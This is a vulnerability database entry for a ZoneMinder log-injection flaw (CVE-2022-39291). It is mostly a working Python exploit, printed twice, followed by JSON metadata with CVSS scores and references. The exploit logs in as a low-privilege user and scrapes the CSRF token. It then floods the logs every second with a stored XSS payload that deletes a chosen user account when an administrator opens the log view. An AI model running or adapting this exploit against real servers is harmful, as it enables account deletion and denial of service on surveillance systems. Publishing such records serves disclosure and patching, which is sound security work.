VAR-202210-0071
Vulnerability from variot - Updated: 2025-01-30 20:08ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with "View" system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the "/zm/index.php" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. ZoneMinder There is an input validation vulnerability in.Information is tampered with and service operation is interrupted (DoS) It may be in a state. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http:///zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests import re import time import argparse import sys
def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession)
Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58¤t=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0071",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39291",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-39291",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39291",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39291",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39291",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2022-39291",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-329",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. Affected versions of zoneminder are subject to a vulnerability which allows users with \"View\" system permissions to inject new data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the \"/zm/index.php\" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources. Users are advised to upgrade. There are no known workarounds for this issue. ZoneMinder There is an input validation vulnerability in.Information is tampered with and service operation is interrupted (DoS) It may be in a state. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39291"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39291",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "51071",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"id": "VAR-202210-0071",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:08:46.417000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209968"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "Inappropriate input confirmation (CWE-20) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/34ffd92bf123070cab6c83ad4cfe6297dd0ed0b4"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/73d9f2482cdcb238506388798d3cf92546f9e40c"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/cb3fc5907da21a5111ae54128a5d0b49ae755e9b"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/de2866f9574a2bf2690276fad53c91d607825408"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-cfcx-v52x-jh74"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/51071"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39291/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"date": "2022-10-07T21:15:11.770000",
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018647"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-329"
},
{
"date": "2023-03-27T18:15:11.797000",
"db": "NVD",
"id": "CVE-2022-39291"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Input verification vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018647"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-329"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
